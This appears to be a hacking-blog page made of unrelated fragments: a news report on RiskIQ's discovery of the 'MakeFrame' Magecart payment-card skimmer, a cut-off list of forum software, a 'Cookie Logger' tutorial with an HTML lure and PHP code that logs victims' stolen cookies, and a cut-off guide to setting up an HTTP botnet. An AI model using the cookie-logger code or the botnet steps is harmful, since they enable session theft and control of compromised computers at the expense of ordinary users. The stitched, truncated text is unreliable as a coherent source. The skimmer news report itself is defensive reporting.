Magecart Hackers Inject iFrame Skimmers in 19 Sites to Steal Payment Data

Cybersecurity researchers today uncovered an ongoing new Magecart skimmer campaign that so far has successfully compromised at least 19 different e-commerce websites to steal payment card details of their customers.

According to a report published today and shared with The Hacker News, RiskIQ researchers spotted a new digital skimmer, dubbed "MakeFrame," that injects HTML iframes into web-pages to phish payment data.

MakeFrame attacks have been attributed to Magecart Group 7 for its approach of using the compromised sites to host the skimming code, load the skimmer on other compromised websites, and siphoned off the stolen data.

Magecart attacks usually involve bad actors compromising a company's online store to siphon credit card numbers and account details of users who're making purchases on the infected site by placing malicious JavaScript skimmers on payment forms.

It's the latest in a series of attacks by Magecart, an umbrella term for eight different hacking groups, all of which are focused on stealing credit card numbers for financial gain.

Hackers associated with Magecart tactics have hit many high profile websites in the past few years, including NutriBullet, Olympics ticket reselling websites, Macy's, Ticketmaster, British Airways, consumer electronics giant Newegg, and many other e-commerce platforms.

RiskIQ had said it took just 22 lines of JavaScript code infection for the attackers to gain real-time access to the sensitive data in question.

Using Obfuscation to Avoid Detection

The new MakeFrame Skimmer code, a blob of the hex-encoded array of strings and obfuscated code, is included between benign code to escape detection, RiskIQ researchers said.

But in a twist, the code is impossible to be deobfuscated due to a check (_0x5cc230['removeCookie']) that ensures it is not altered. When this check passes, the skimmer code is reconstructed by decoding the obfuscated strings.

Once the skimmer is added on the victim site, MakeFrame also has provisions to emulate the payment method, use iframes to create a payment form, detect the data entered into the fake payment form upon pressing of the "submit" button, and exfiltrate the card information in the form '.php' files to another compromised domain (piscinasecologicas dot com).

"This method of exfiltration is the same as that used by Magecart Group 7, sending stolen data as .php files to other compromised sites for exfiltration," RiskIQ said.

"Each compromised site used for data exfil has also been injected with a skimmer and has been used to host skimming code loaded on other victim sites as well."

Stating that three distinct versions of this skimmer with varying levels of obfuscation have been identified, RiskIQ said each of the affected websites is a small or medium-sized business.

Increasing prevalence of Magecart attacks

Although spotted in the wild since 2010, this kind of intrusion — dubbed Magecart attack because of the threat actors' initial preference for Magento e-commerce platform to gather illicit card data — has intensified over the last few years.

"Magecart is a rapidly growing cybercrime syndicate comprised of dozens of subgroups that specialize in cyberattacks involving digital credit card theft," RiskIQ previously noted in its report on the Magecart actors.

In addition, the actors behind these compromises have automated the process of compromising websites with skimmers by actively scanning for misconfigured Amazon S3 buckets.

The recent wave of e-skimming attacks has grown so widespread — affecting over 18,000 domains — that it led the FBI to issue a warning about the emerging cyber threat and urging businesses to erect sufficient security barriers to protect themselves.

The intelligence agency, in an advisory posted last month, recommended that companies keep their software up-to-date, enable multi-factor authentication, segregate critical network infrastructure, and watch out for phishing attacks.

"This latest skimmer from Group 7 is an illustration of their continued evolution, honing tried and true techniques and developing new ones all the time," RiskIQ concluded.

"They are not alone in their endeavors to improve, persist, and expand their reach. RiskIQ data shows Magecart attacks have grown 20 percent amid the COVID-19 pandemic. With many homebound people forced to purchase what they need online, the digital skimming threat to e-commerce is as pronounced as ever."

Source : The Hacker News

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h

Cookie Logger

Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary

[ HTTP ] How to Setup a Botnet [ Free Website+Hosting ]

[ HTTP ] How to Setup a Botnet [ Free Website+Hosting ] lots of people ask me How To Setup Botnet, huhhhhhaaaawwwwwwww, Here Is Tutorial, How To Setup a HTTP Botnet + Getting a Website and Hosting. Some things you need to know: A Botnet is a Panel that can keep many Computers connected to it. The Computers connected to it is called Bots. The bots will be under your Command so you will be able to command them to do things and they will do it. In this tutorial I will teach you how to setup a Botnet. Alright lets start. If you already got a Website + Hosting Dont click on this Spoiler, if you dont click PS. Website name cannot be longer than 12 Characters. Spoiler First go to Dot.Tk and Register After you login go to Domain Panel and then add a Domain Name Now open a new browser and go to DerpyMail ( Free Hosting ) Add the free hosting to you cart and register then checkout! Go back to Dot.TK and go to the Domain Panel and Click Modify Change the Name Ser

Hacks

Search This Blog